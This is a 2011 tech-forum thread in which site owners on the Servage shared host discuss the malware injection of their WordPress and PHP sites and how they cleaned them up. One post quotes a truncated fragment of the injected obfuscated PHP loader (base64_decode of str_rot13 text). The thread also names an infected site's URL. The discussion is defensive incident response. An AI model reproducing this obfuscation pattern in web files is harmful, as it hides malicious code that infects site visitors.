Geekzone: technology news, blogs, forums
Guest
Welcome Guest.
You haven't logged in yet. If you don't have an account you can register now.


ForumsIT Pro and developersFive Wordpress sites hacked (servage.net)
GeoffisPure

459 posts

Ultimate Geek
+1 received by user: 73


#83136 11-May-2011 10:56
Send private message

I'm wondering if anyone here as experience with hacked Wordpress sites?  I have 5 wordpress sites on the same hosting account (shared)  and today when I woke up, each one of these sites is downloading malware to whomever visits the sites.

I have downloaded the core wordpress files and copied them over the existing ones, hoping that would fix the problem, but it hasn't.


Can anyone provide advice that might help clean up these infections but still leave the sites functional?  Having to start 5 wordpress sites from scratch (with all their individual customisations) would be such a chore.

I will provide an example site, but just to repeat:  this site has been infected!
http://www.nalastud.co.nz/   Watch the taskbar while it loads and you'll see what I mean.

Any tips please?

View this topic in a long page with up to 500 replies per page Create new topic
 1 | 2 | 3 | 4 | 5
jbard
1377 posts

Uber Geek
+1 received by user: 17


  #467860 11-May-2011 11:01
Send private message

This is why it is extremely important to keep popular CMS up to date, anyway to help with your problem i assume the person has added some script to the pages to force the download of malware - firstly i would suggest taking them offline so not to infect anyone. Then update wordpress to the latest release and try and track where the script was placed.

I imagine the script would have been placed in a file shared between all files on the site such as a head or css file.

Have a look at the source code and see if that helps.



GeoffisPure

459 posts

Ultimate Geek
+1 received by user: 73


  #467865 11-May-2011 11:15
Send private message

Really appreciate your quick reply Jbard.  I usually do upgrade Wordpress as soon as I'm given the option, but I guess it only took one exploit for it to spread like wild fire.

I have found the injected code in MANY php files that were edited two days ago.  The injected code looks like this:


php $somecrainsignvar="kfb2rpgv"; echo base64_decode(str_rot13('CUAwpzyjqQ5xLKEyCJ5yqlO...
  
 


(Sorry, I don't know the ettiquette for pasting code here)
I thought by uploading the entire Wordpress package over everything it would have fixed it, but I've seen the clean files become infected again too. :(

muppet
2642 posts

Uber Geek
+1 received by user: 1660

Trusted

  #467870 11-May-2011 11:20
Send private message

Have you spoken to the hosting provider?
Maybe their php install has been modified to inject code?

Unlikely, but possible.

Since you reuploaded the files, can you see the injected code in them again?

Possible that you have a module/add-on that'd been compromised?

Tim




Audiophiles are such twits! They buy such pointless stuff: Gold plated cables, $2000 power cords. Idiots.

 

OOOHHHH HYPERFIBRE!



GeoffisPure

459 posts

Ultimate Geek
+1 received by user: 73


  #467873 11-May-2011 11:31
Send private message

Yes I have spoken to the host (servage.net) but they are hopeless. Just the usual "make sure you change your password" and "there's nothing we can do, you'll have to reinstall everything from your backups" etc.

Another point I should mention is that it's not JUST wordpress sites that have been hacked. I have another PHP-based forum which now has the iframe injections. And because these are on different domains, I'm inclined to believe that the hacker gained access to my FTP account.

I have changed my FTP password now, and will likely lock separate FTP accounts to individual domains.

Interestingly, one site that I replaced the core Wordpress files for is now infection free, but two sites that I did the exact same thing to still show the malware. I wonder where it'd hiding... driving me nuts.

muppet
2642 posts

Uber Geek
+1 received by user: 1660

Trusted

  #467874 11-May-2011 11:33
Send private message

So diff the source files you have fresh vs the ones you think are infected.
Check md5/sha1 sums etc.

You'll find it eventually.

The main concern is how it got there in the first place.




Audiophiles are such twits! They buy such pointless stuff: Gold plated cables, $2000 power cords. Idiots.

 

OOOHHHH HYPERFIBRE!

GeoffisPure

459 posts

Ultimate Geek
+1 received by user: 73


  #467880 11-May-2011 11:44
Send private message

I have been copying (and overwriting) ALL the wordpress files, though. Shouldn't that be enough? I guess it means the hackers have created additional that still remain and someone get their code executed...

 
 
 
 

Shop now at Mighty Ape (affiliate link).
muppet
2642 posts

Uber Geek
+1 received by user: 1660

Trusted

  #467883 11-May-2011 11:47
Send private message

It depends. If you've got them consistantly hitting you with an exploit, unless you replace every single file at once, you might find a single exploit infects every other file again.

Moving all files out of the webserver directory and ensuring they're fixed, then moving them back might be a better plan.

You also need to find the source of the exploit.  If you don't do this, it'll probably just keep happening. 




Audiophiles are such twits! They buy such pointless stuff: Gold plated cables, $2000 power cords. Idiots.

 

OOOHHHH HYPERFIBRE!

GeoffisPure

459 posts

Ultimate Geek
+1 received by user: 73


  #467886 11-May-2011 11:53
Send private message

Is there any software you know of that will search within multiple files? For example if I downloaded every file off the server onto my computer, and searched them all for a portion of the string?

And yeah, I'm changing all my passwords and deleting as many security hazards as I can find...

jbard
1377 posts

Uber Geek
+1 received by user: 17


  #467887 11-May-2011 11:54
Send private message

GeoffisPure: Is there any software you know of that will search within multiple files? For example if I downloaded every file off the server onto my computer, and searched them all for a portion of the string?

And yeah, I'm changing all my passwords and deleting as many security hazards as I can find...


Dreamweaver can do that. 

muppet
2642 posts

Uber Geek
+1 received by user: 1660

Trusted

  #467889 11-May-2011 11:55
Send private message

GeoffisPure: Is there any software you know of that will search within multiple files? For example if I downloaded every file off the server onto my computer, and searched them all for a portion of the string?

And yeah, I'm changing all my passwords and deleting as many security hazards as I can find...


grep?

I assume you're on windows.  http://gnuwin32.sourceforge.net/packages/grep.htm 




Audiophiles are such twits! They buy such pointless stuff: Gold plated cables, $2000 power cords. Idiots.

 

OOOHHHH HYPERFIBRE!

BeFs
1 post

Wannabe Geek
Inactive user


  #468183 12-May-2011 09:57
Send private message

Got the same problem with Servage. Found this thread when googling the problem.
This is the second time my files got malware in them. About a year a go all my index.php-files where infected, not only wordpress. And they tried to blame it on me...

Moving away to a new host as we speak. Have been with Servage many years now, but now I´m tired of cleaning up my files because their bad security.

HP

 
 
 
 

Shop now for HP laptops and other devices (affiliate link).
ChrisR
16 posts

Geek


  #468522 12-May-2011 22:42
Send private message

This is a fascinating thread - my Servage account was also hit sometime in the previous 24 hours, with what looks to be an identical exploit. Several PHP scripts had code inserted at the top of the page which starts "$somecrainsignvar=" and then proceeds to execute the redirect using "echo base64_decode(str_rot13(".

We operate our own in-house PHP code (no WordPress CMS) with a few simple scripts (Swift mailer & Radinks Java uploader) and all of our form inputs are scrubbed to remove injected code. All uploads are also quarantined in folders with .htaccess restrictions on all script executions. I too have been told to change passwords and reupload my files (very annoying) and check folder permissions but none of this means much if the hacker gained access through the Control Panel. 

Anyone got any good ideas on where the point of access might have been? 

Cheers, ChrisR. 

GeoffisPure

459 posts

Ultimate Geek
+1 received by user: 73


  #468523 12-May-2011 22:48
Send private message

Hi Chris & Befs,
I have just finished restoring all my wordpress sites (and even non-wordpress sites) to their pre-malware conditions... fingers crossed!

This particular hacker/malware infector was quite thorough, and injected their PHP code in many (but not all) PHP files throughout my sites.

I may post a detailed clean-up instruction later, but where I was going wrong was assuming that it was only the core wordpress files that were edited. It wasn't. Once I cleaned up the plugins and theme folders too, my sites are now malware free. Fingers crossed, at least.

It definitey sounds like a problem with servage to me, though I've tried contacting them and they won't have a bar of it. The infections spread across multiple domain names, but within the same account. While it's possible they cracked my FTP password that could access all the sites (and have changed my password accordingly), I think this is unlikely.

freitasm
BDFL - Memuneh
80646 posts

Uber Geek
+1 received by user: 41030

Administrator
ID Verified
Trusted
Geekzone
Lifetime subscriber

  #468525 12-May-2011 22:50
Send private message

Interesting, just did a quick search on this provider and it seems every few months there is an event like this...




Referral links: Quic Broadband (free setup code: R587125ERQ6VE) | Samsung | AliExpress | Wise | Sharesies 

 

Support Geekzone by subscribing (browse ads-free), or making a one-off or recurring donation through PressPatron.

 

GeoffisPure

459 posts

Ultimate Geek
+1 received by user: 73


  #468527 12-May-2011 22:59
Send private message

I have just submitted the following support ticket to Servage. Can somebody please teach me the correct method of displaying quotes/code in forum posts?   Anyway, I'll let you know if any reply:


Good Evening,
Can I please draw your attention to the following forum page:
http://www.geekzone.co.nz/forums.asp?forumid=72&topicid=83136

On this page, you will see me explaining a problem I previously contacted you about  (code injection, which I've now fixed), but what I would like to draw your attention to is the fact that at least two other Servage customers have experienced the same problem in the past two days.

I find it hard to accept that somebody guessed my control panel or FTP passwords (but I've changed them anyway),  and want to urge servage to investigate what appears to be a widespread problem with security.

Thank you.

 1 | 2 | 3 | 4 | 5
View this topic in a long page with up to 500 replies per page Create new topic








Geekzone Live »

Try automatic live updates from Geekzone directly in your browser, without refreshing the page, with Geekzone Live now.


Updates »

Are you subscribed to our RSS feed? You can download the latest headlines and summaries from our stories directly to your computer or smartphone by using a feed reader.








RSS feeds
Main feed
Forums feed
Copyright
©2002-2026 Geekzone®
Site features
Geekzone BI dashboard
Geekzone Badges
Geekzone Status Page

 

Site Information
Subscribe to Geekzone
Privacy Statement
Forum Usage Guidelines (FUG)
Advertising
Trademark and copyright